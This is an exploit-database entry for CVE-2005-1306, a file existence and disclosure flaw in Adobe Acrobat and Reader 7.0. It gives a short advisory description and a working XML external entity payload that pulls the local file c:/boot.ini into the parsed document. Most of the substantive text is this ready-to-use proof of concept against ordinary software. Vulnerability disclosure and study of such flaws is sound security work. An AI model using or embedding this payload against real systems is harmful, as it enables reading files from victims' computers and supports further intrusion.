Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure
| EKU-ID: 31158 | CVE: CVE-2005-1306;OSVDB-17325 | OSVDB-ID: |
| Author: Sverre H. Huseby | Published: 2005-06-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 31158 | CVE: CVE-2005-1306;OSVDB-17325 | OSVDB-ID: |
| Author: Sverre H. Huseby | Published: 2005-06-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/13962/info Adobe Acrobat and Adobe Reader may allow remote attackers to determine the existence of files on a vulnerable computer. This issue can be used to disclose data from a target file as well. Information gathered through the exploitation of this vulnerability may aid in other attacks. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "c:/boot.ini"> ]> <foo>&xxe;</foo>